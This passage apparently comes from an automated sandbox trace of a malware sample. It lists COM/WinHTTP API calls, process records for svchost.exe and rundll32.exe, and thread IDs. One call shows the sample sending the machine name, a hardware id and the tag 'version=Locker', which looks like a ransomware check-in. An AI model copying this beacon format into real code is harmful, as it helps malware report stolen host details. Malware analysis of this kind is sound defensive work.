Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75f208*="Send", cNames=0x1, lcid=0x800, rgDispId=0x75f30c | out: rgDispId=0x75f30c*=5) returned 0x0 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.279] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x896c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x75f200 | out: ppTInfo=0x75f200*=0xa8727c) returned 0x0 [0279.279] ITypeInfo:RemoteGetTypeAttr (in: This=0xa8727c, ppTypeAttr=0x75f1f8, pDummy=0x356310 | out: ppTypeAttr=0x75f1f8, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalGetIDsOfNames (This=0xa8727c) returned 0x0 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x0, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x1, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x2, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x3, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x4, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x5, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x6, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x7, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x8, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x9, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xa, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.279] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xb, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.279] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.280] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xc, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.280] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.280] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xd, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.280] ITypeInfo:LocalReleaseTypeAttr (This=0xa8727c) returned 0xa377a8 [0279.280] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.280] WinHttpRequest:IUnknown:Release (This=0xa8727c) returned 0x1 [0279.280] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x24) returned 0xa7af90 [0279.280] WinHttpRequest:IDispatch:Invoke (This=0x896c30, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f2f0*(rgvarg=([0]=0xa7af94*(varType=0x8, wReserved1=0xa7, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=lRkgbQYaCk332OjZVleT&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8, puArgErr=0x75f300) Thread: id = 361 os_tid = 0x4f4 Thread: id = 362 os_tid = 0x65c Thread: id = 363 os_tid = 0x52c Thread: id = 364 os_tid = 0x508 Thread: id = 366 os_tid = 0x73c Thread: id = 369 os_tid = 0x5c0 Thread: id = 370 os_tid = 0x4fc Thread: id = 374 os_tid = 0xe8 Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xc680000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7b3" [0xc000000f], "LOCAL" [0x7] Thread: id = 334 os_tid = 0x1c4 Thread: id = 335 os_tid = 0xcc Thread: id = 336 os_tid = 0x72c Thread: id = 337 os_tid = 0x4b8 Thread: id = 338 os_tid = 0xc4 Thread: id = 339 os_tid = 0x5b4 Thread: id = 340 os_tid = 0x718 Thread: id = 341 os_tid = 0x658 Thread: id = 342 os_tid = 0x650 Thread: id = 343 os_tid = 0x648 Thread: id = 344 os_tid = 0x5f8 Thread: id = 345 os_tid = 0x578 Thread: id = 346 os_tid = 0x460 Thread: id = 347 os_tid = 0x448 Thread: id = 348 os_tid = 0x444 Thread: id = 349 os_tid = 0x424 Thread: id = 350 os_tid = 0x3c4 Thread: id = 351 os_tid = 0x3bc Thread: id = 352 os_tid = 0x3ac Thread: id = 353 os_tid = 0x300 Thread: id = 354 os_tid = 0x2fc Thread: id = 355 os_tid = 0x2d8 Thread: id = 356 os_tid = 0x2d0 Process: id = "47" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x5b1b7000" os_pid = "0x520" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x57c" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 365 os_tid = 0x704 Thread: id = 367 os_tid = 0x34c Thread: id = 368 os_tid = 0x760 Thread: id = 371 os_tid = 0x3c8 Thread: id = 372 os_tid = 0x7d8 Thread: id = 373 os_tid = 0x6bc